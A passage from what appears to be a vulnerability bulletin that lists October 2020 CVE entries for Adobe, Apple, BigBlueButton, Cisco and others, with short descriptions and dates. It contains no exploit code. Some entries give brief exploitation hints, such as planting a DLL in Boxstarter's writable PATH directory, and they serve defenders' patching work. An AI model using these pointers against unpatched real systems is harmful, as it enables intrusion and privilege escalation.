Adobe Media Encoder version 14.4 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24423
MISC
adobe — photoshop
 
Adobe Photoshop for Windows version 21.2.1 (and earlier) is affected by an uncontrolled search path element vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24420
MISC
adobe — premiere_pro
 
Adobe Premiere Pro version 14.4 (and earlier) is affected by an uncontrolled search path element that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24424
MISC
amazon — aws_firecracker
 
In Amazon AWS Firecracker before 0.21.3, and 0.22.x before 0.22.1, the serial console buffer can grow its memory usage without limit when data is sent to the standard input. This can result in a memory leak on the microVM emulation thread, possibly occupying more memory than intended on the host. 2020-10-16 not yet calculated CVE-2020-27174
MLIST
MISC
MISC
MISC
anuko — time_tracker
 
In Anuko Time Tracker before version 1.19.23.5325, because user input is not properly filtered, a CSV export of a report could contain cells that are treated as formulas by spreadsheet software (for example, when a cell value starts with an equal sign). This is fixed in version 1.19.23.5325. 2020-10-16 not yet calculated CVE-2020-15255
MISC
CONFIRM
apache — hadoop
 
Web endpoint authentication check is broken in Apache Hadoop 3.0.0-alpha4, 3.0.0-beta1, and 3.0.0. Authenticated users may impersonate any user even if no proxy user is configured. 2020-10-21 not yet calculated CVE-2018-11764
MISC
apache — kylin
 
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one RESTful API that exposes Kylin’s configuration information without any authentication, so some confidential information entries will be disclosed to everyone. 2020-10-19 not yet calculated CVE-2020-13937
MISC
apereo — cas
 
Apereo CAS 5.3.x before 5.3.16, 6.x before 6.1.7.2, 6.2.x before 6.2.4, and 6.3.x before 6.3.0-RC4 mishandles secret keys with Google Authenticator for multifactor authentication. 2020-10-16 not yet calculated CVE-2020-27178
MISC
apple — macos_catalina An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A local user may be able to cause unexpected system termination or read kernel memory. 2020-10-22 not yet calculated CVE-2020-9779
MISC
apple — macos_catalina A race condition was addressed with additional validation. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9990
MISC
apple — macos_catalina
 
This issue was addressed with a new entitlement. This issue is fixed in macOS Catalina 10.15.4. A user may gain access to protected parts of the file system. 2020-10-22 not yet calculated CVE-2020-9771
MISC
apple — macos_catalina
 
A file access issue existed with certain home folder files. This was addressed with improved access restrictions. This issue is fixed in macOS Catalina 10.15.7. A malicious application may be able to read sensitive location information. 2020-10-22 not yet calculated CVE-2020-9986
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. An application may be able to gain elevated privileges. 2020-10-22 not yet calculated CVE-2020-3898
MISC
apple — macos_catalina
 
A path handling issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to overwrite arbitrary files. 2020-10-22 not yet calculated CVE-2020-3915
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. Viewing a maliciously crafted JPEG file may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9887
MISC
apple — macos_catalina
 
A race condition was addressed with improved state handling. This issue is fixed in macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9796
MISC
apple — macos_catalina
 
A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.5. A person with physical access to a Mac may be able to bypass Login Window. 2020-10-22 not yet calculated CVE-2020-9810
MISC
apple — macos_catalina
 
An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A remote attacker may be able to leak sensitive user information. 2020-10-22 not yet calculated CVE-2020-9828
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A remote attacker may cause an unexpected application termination. 2020-10-22 not yet calculated CVE-2020-9869
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9899
MISC
apple — macos_catalina
 
An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, watchOS 6.2.8. A malicious application may disclose restricted memory. 2020-10-22 not yet calculated CVE-2020-9997
MISC
MISC
apple — macos_catalina
 
This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to load unsigned kernel extensions. 2020-10-22 not yet calculated CVE-2020-9939
MISC
apple — macos_catalina
 
A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6. A user may be unexpectedly logged in to another user’s account. 2020-10-22 not yet calculated CVE-2020-9935
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory. 2020-10-22 not yet calculated CVE-2020-9929
MISC
apple — macos_catalina
 
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9928
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9927
MISC
apple — macos_catalina
 
A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6. A remote attacker may be able to cause a denial of service. 2020-10-22 not yet calculated CVE-2020-9924
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-22 not yet calculated CVE-2020-9921
MISC
apple — macos_catalina
 
An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory. 2020-10-22 not yet calculated CVE-2020-9908
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to determine kernel memory layout. 2020-10-22 not yet calculated CVE-2020-9853
MISC
apple — multiple_products A certificate validation issue existed when processing administrator added certificates. This issue was addressed with improved certificate validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An attacker may have been able to impersonate a trusted website using shared key material for an administrator added certificate. 2020-10-22 not yet calculated CVE-2020-9868
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9938
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9872
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to determine kernel memory layout. 2020-10-22 not yet calculated CVE-2020-9902
MISC
MISC
MISC
MISC
apple — multiple_products Multiple memory corruption issues were addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-22 not yet calculated CVE-2020-9892
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5. An application may be able to gain elevated privileges. 2020-10-22 not yet calculated CVE-2020-9854
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. Some websites may not have appeared in Safari Preferences. 2020-10-22 not yet calculated CVE-2020-9787
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9873
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9883
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9880
MISC
MISC
MISC
MISC
apple — multiple_products An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A local attacker may be able to elevate their privileges. 2020-10-22 not yet calculated CVE-2020-9900
MISC
MISC
MISC
MISC
apple — multiple_products A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9881
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9984
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9937
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9879
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9882
MISC
MISC
MISC
apple — multiple_products
 
A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A malicious mail server may overwrite arbitrary mail files. 2020-10-22 not yet calculated CVE-2020-9920
MISC
MISC
MISC
apple — multiple_products
 
A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. 2020-10-22 not yet calculated CVE-2020-9906
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9877
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
This issue was addressed with improved entitlements. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A sandboxed process may be able to circumvent sandbox restrictions. 2020-10-22 not yet calculated CVE-2020-9898
MISC
MISC
apple — multiple_products
 
A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. A remote attacker may be able to cause a denial of service. 2020-10-22 not yet calculated CVE-2020-9905
MISC
MISC
MISC
apple — multiple_products
 
A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9904
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9876
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9919
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9874
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A sandboxed process may be able to circumvent sandbox restrictions. 2020-10-22 not yet calculated CVE-2020-9772
MISC
MISC
MISC
MISC
apple — multiple_products
 
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9940
MISC
MISC
MISC
apple — multiple_products
 
An integer overflow was addressed through improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9875
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An access issue was addressed with additional sandbox restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A local user may be able to view sensitive user information. 2020-10-22 not yet calculated CVE-2020-3918
MISC
MISC
MISC
MISC
apple — multiple_products
 
An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. A local attacker may be able to elevate their privileges. 2020-10-22 not yet calculated CVE-2020-9901
MISC
MISC
MISC
apple — multiple_products
 
A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to overwrite arbitrary files. 2020-10-22 not yet calculated CVE-2020-9994
MISC
MISC
MISC
MISC
apple — multiple_products
 
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9985
MISC
MISC
MISC
apple — multiple_products
 
A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9863
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9871
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted font file may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9980
MISC
MISC
MISC
MISC
aptean — product_configurator
 
An issue was discovered in Aptean Product Configurator 4.61.0000 on Windows. A time-based SQL injection affects the nameTxt parameter on the main login page (aka cse?cmd=LOGIN). This can be exploited directly and remotely. 2020-10-16 not yet calculated CVE-2020-26944
MISC
MISC
arista — eos
 
Arista EOS before 4.21.12M, 4.22.x before 4.22.7M, 4.23.x before 4.23.5M, and 4.24.x before 4.24.2F allows remote attackers to cause a denial of service (restart of agents) by crafting a malformed DHCP packet which leads to an incorrect route being installed. 2020-10-21 not yet calculated CVE-2020-17355
CONFIRM
atmel — advanced_software_framework
 
Atmel Advanced Software Framework (ASF) 4 has an Integer Overflow. 2020-10-22 not yet calculated CVE-2019-16127
MISC
MISC
MLIST
atomxcms — atomxcms
 
AtomXCMS 2.0 is affected by Incorrect Access Control via admin/dump.php 2020-10-22 not yet calculated CVE-2020-26649
MISC
atomxcms — atomxcms
 
AtomXCMS 2.0 is affected by Arbitrary File Read via admin/dump.php 2020-10-22 not yet calculated CVE-2020-26650
MISC
bass — audio_library

 

The BASSMIDI plugin 2.4.12.1 for Un4seen BASS Audio Library on Windows is prone to an out of bounds write vulnerability. An attacker may exploit this to execute code on the target machine. A failure in exploitation leads to a denial of service. 2020-10-16 not yet calculated CVE-2019-19513
MISC
MISC
bass — audio_library

 

The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Denial of Service vulnerability (infinite loop) via a crafted .mp3 file. This weakness could allow attackers to consume excessive CPU and the application becomes unresponsive. 2020-10-16 not yet calculated CVE-2019-18796
MISC
MISC
bass — audio_library
 
The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Use after Free vulnerability via a crafted .ogg file. An attacker can exploit this to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service. 2020-10-16 not yet calculated CVE-2019-18794
MISC
MISC
bass — audio_library
 
The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile out of bounds read vulnerability via a crafted .wav file. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service. 2020-10-16 not yet calculated CVE-2019-18795
MISC
MISC
belkin — linksys_wrt160nl
 
** UNSUPPORTED WHEN ASSIGNED ** Belkin LINKSYS WRT160NL 1.0.04.002_US_20130619 devices have a stack-based buffer overflow vulnerability because of sprintf in create_dir in mini_httpd. Successful exploitation leads to arbitrary code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-10-23 not yet calculated CVE-2020-26561
MISC
bender — multiple_devices
 
In Bender COMTRAXX, user authorization is validated for most, but not all, routes in the system. A user with knowledge about the routes can read and write configuration data without prior authorization. This affects COM465IP, COM465DP, COM465ID, CP700, CP907, and CP915 devices before 4.2.0. 2020-10-16 not yet calculated CVE-2019-19885
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton before 2.2.28 (or earlier) does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session. 2020-10-21 not yet calculated CVE-2020-27606
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton before 2.2.27 has an unsafe JODConverter setting in which LibreOffice document conversions can access external files. 2020-10-21 not yet calculated CVE-2020-27603
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton through 2.2.28 uses Ghostscript for processing of uploaded EPS documents, and consequently may be subject to attacks related to a “schwache Sandbox.” 2020-10-21 not yet calculated CVE-2020-27605
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton before 2.3 does not implement LibreOffice sandboxing. This might make it easier for remote authenticated users to read the API shared secret in the bigbluebutton.properties file. With the API shared secret, an attacker can (for example) use api/join to join an arbitrary meeting regardless of its guestPolicy setting. 2020-10-21 not yet calculated CVE-2020-27604
MISC
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton before 2.2.7 allows remote authenticated users to read local files and conduct SSRF attacks via an uploaded Office document that has a crafted URL in an ODF xlink field. 2020-10-21 not yet calculated CVE-2020-25820
MISC
MISC
MISC
MISC
MISC
bigbluebutton — bigbluebutton
 
In BigBlueButton before 2.2.28 (or earlier), the client-side Mute button only signifies that the server should stop accepting audio data from the client. It does not directly configure the client to stop sending audio data to the server, and thus a modified server could store the audio data and/or transmit it to one or more meeting participants or other third parties. 2020-10-21 not yet calculated CVE-2020-27607
MISC
bigbluebutton — bigbluebutton
 
In BigBlueButton before 2.2.28 (or earlier), uploaded presentations are sent to clients without a Content-Type header, which allows XSS, as demonstrated by a .png file extension for an HTML document. 2020-10-21 not yet calculated CVE-2020-27608
MISC
bigbluebutton — bigbluebutton
 
The installation procedure in BigBlueButton before 2.2.28 (or earlier) exposes certain network services to external interfaces, and does not automatically set up a firewall configuration to block external access. 2020-10-21 not yet calculated CVE-2020-27610
MISC
bigbluebutton — bigbluebutton
 
The installation procedure in BigBlueButton before 2.2.28 (or earlier) uses ClueCon as the FreeSWITCH password, which allows local users to achieve unintended FreeSWITCH access. 2020-10-21 not yet calculated CVE-2020-27613
MISC
bigbluebutton — bigbluebutton
 
Greenlight in BigBlueButton through 2.2.28 places usernames in room URLs, which may represent an unintended information leak to users in a room, or an information leak to outsiders if any user publishes a screenshot of a browser window. 2020-10-21 not yet calculated CVE-2020-27612
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton through 2.2.28 uses STUN/TURN resources from a third party, which may represent an unintended endpoint. 2020-10-21 not yet calculated CVE-2020-27611
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton through 2.2.28 records a video meeting despite the deactivation of video recording in the user interface. This may result in data storage beyond what is authorized for a specific meeting topic or participant. 2020-10-21 not yet calculated CVE-2020-27609
MISC
MISC
bigbluebutton — bigbluebutton
 
A cross-site scripting (XSS) vulnerability exists in the ‘merge account’ functionality in admins.js in BigBlueButton Greenlight 2.7.6. 2020-10-22 not yet calculated CVE-2020-27642
MISC
biscom — secure_file_transfer
 
Biscom Secure File Transfer (SFT) before 5.1.1082 and 6.x before 6.0.1011 allows user credential theft. 2020-10-22 not yet calculated CVE-2020-27646
MISC
blinger.io — blinger.io
 
Blinger.io v.1.0.2519 is vulnerable to Blind/Persistent XSS. An attacker can send arbitrary JavaScript code via a built-in communication channel, such as Telegram, WhatsApp, Viber, Skype, Facebook, Vkontakte, or Odnoklassniki. This is mishandled within the administration panel for conversations/all, conversations/inbox, conversations/unassigned, and conversations/closed. 2020-10-19 not yet calculated CVE-2019-13633
MISC
MISC
boxstarter — boxstarter
 
The Boxstarter installer before version 2.13.0 configures C:\ProgramData\Boxstarter to be in the system-wide PATH environment variable. However, this directory is writable by normal, unprivileged users. To exploit the vulnerability, place a DLL in this directory that a privileged service is looking for. For example, WptsExtensions.dll. When Windows starts, it’ll execute the code in DllMain() with SYSTEM privileges. Any unprivileged user can execute code with SYSTEM privileges. The issue is fixed in version 3.13.0 2020-10-20 not yet calculated CVE-2020-15264
MISC
CONFIRM
CERT-VN
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the SSL/TLS session handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory leak when closing SSL/TLS connections in a specific state. An attacker could exploit this vulnerability by establishing several SSL/TLS sessions and ensuring they are closed under certain conditions. A successful exploit could allow the attacker to exhaust memory resources in the affected device, which would prevent it from processing new SSL/TLS connections, resulting in a DoS. Manual intervention is required to recover an affected device. 2020-10-21 not yet calculated CVE-2020-3572
CISCO
cisco — adaptive_security_appliance_and_cisco_firepower_threat_defense_software
 
A vulnerability in the FTP inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass FTP inspection. The vulnerability is due to ineffective flow tracking of FTP traffic. An attacker could exploit this vulnerability by sending crafted FTP traffic through an affected device. A successful exploit could allow the attacker to bypass FTP inspection and successfully complete FTP connections. 2020-10-21 not yet calculated CVE-2020-3564
CISCO
cisco — adaptive_security_appliance_and_cisco_firepower_threat_defense_software
 
A vulnerability in the Clientless SSL VPN (WebVPN) of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to inject arbitrary HTTP headers in the responses of the affected system. The vulnerability is due to improper input sanitization. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to conduct a CRLF injection attack, adding arbitrary HTTP headers in the responses of the system and redirecting the user to arbitrary websites. 2020-10-21 not yet calculated CVE-2020-3561
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the SIP inspection process of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a crash and reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to a watchdog timeout and crash during the cleanup of threads that are associated with a SIP connection that is being deleted from the connection list. An attacker could exploit this vulnerability by sending a high rate of crafted SIP traffic through an affected device. A successful exploit could allow the attacker to cause a watchdog timeout and crash, resulting in a crash and reload of the affected device. 2020-10-21 not yet calculated CVE-2020-3555
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. 2020-10-21 not yet calculated CVE-2020-3581
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. 2020-10-21 not yet calculated CVE-2020-3583
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
